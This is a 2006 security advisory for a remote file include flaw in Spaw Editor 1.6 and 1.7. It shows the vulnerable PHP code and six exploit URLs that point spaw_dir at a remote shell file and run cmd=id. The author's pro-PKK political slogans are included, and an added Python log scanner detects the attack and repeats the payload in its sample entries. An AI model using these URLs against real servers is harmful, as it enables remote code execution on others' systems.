Spaw Editor Remote Include Vulnerability

2006.08.25
Credit: botan
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

* Kurdish Security Advisory
* Spaw Editor Remote Include Vulnerability
* Our Party is PKK, Our Army HPG, We will Earn
* contact ? : irc.gigachat.net #kurdhack & botan (at) linuxmail (dot) org
* Risk : High
* Class : Remote
* Script : Spaw Editor
* Version : v1.6 and v1.7
* Site : www.solmetra.com

<?
// include wysiwyg config
include '../config/spaw_control.config.php';
include $spaw_root.'class/lang.class.php';

$theme = empty($HTTP_GET_VARS['theme'])?$spaw_default_theme:$HTTP_GET_VARS['theme'];
$theme_path = $spaw_dir.'lib/themes/'.$theme.'/';

$l = new SPAW_Lang($HTTP_GET_VARS['lang']);
$l->setBlock('colorpicker');
?>

http://site.com/[path]/dialogs/a.php?spaw_dir=http://www.shell.txt?&cmd=id
http://site.com/[path]/dialogs/collorpicker.phpspaw_dir=http://www.shell.txt&cmd=id
http://site.com/[path]/dialogs/img.php?spaw_dir=http://www.shell.txt?&cmd=id
http://site.com/[path]/dialogs/img_library.php?spaw_dir=http://www.shell.txt?&cmd=id
http://site.com/[path]/dialogs/table.php?spaw_dir=http://www.shell.txt?&cmd=id
http://site.com/[path]/dialogs/td.php?spaw_dir=http://www.shell.txt?&cmd=id

Special MSG! : The Turk state is the aggressor behavior Don't stay quiet. Hear the Kurdish people is scream be late.. Stop the Turkey Military!
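A log check for the request pattern shown above, as an added example that is not part of the original advisory: it flags requests to a `dialogs/*.php` script whose `spaw_dir` query parameter carries a URL scheme or a leading `//`, including percent-encoded values. The combined access log format, the sample entries and every hostname and address in them are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# The advisory's requests all target scripts under dialogs/.
DIALOG_RE = re.compile(r"/dialogs/[^/]+\.php$", re.IGNORECASE)
# A value with a URL scheme (http:, ftp:, php:, ...) or a leading // is off-host.
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]+:|//)", re.IGNORECASE)

# Constructed sample entries (documentation addresses and hostnames).
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Aug/2006:10:00:01 +0000] '
    '"GET /spaw/dialogs/colorpicker.php?theme=default&lang=en HTTP/1.1" 200 5120',
    '198.51.100.7 - - [25/Aug/2006:10:02:13 +0000] '
    '"GET /spaw/dialogs/img.php?spaw_dir=http://remote.example/shell.txt?&cmd=id HTTP/1.1" 200 312',
    '198.51.100.7 - - [25/Aug/2006:10:02:20 +0000] '
    '"GET /spaw/dialogs/td.php?spaw_dir=http%3A%2F%2Fremote.example%2Fshell.txt%3F&cmd=id HTTP/1.0" 200 312',
    '192.0.2.10 - - [25/Aug/2006:10:03:00 +0000] '
    '"GET /spaw/dialogs/table.php?spaw_dir=/spaw/ HTTP/1.1" 200 4096',
]

def remote_spaw_dir(target):
    """Return the decoded spaw_dir value if it points off-host, else None."""
    parts = urlsplit(target)
    if not DIALOG_RE.search(parts.path):
        return None
    # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name == "spaw_dir" and REMOTE_RE.match(value):
            return value
    return None

def scan(lines):
    """Return (line number, client address, spaw_dir value) for each hit."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match is None:
            continue
        value = remote_spaw_dir(match.group(1))
        if value is not None:
            hits.append((number, line.split()[0], value))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```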

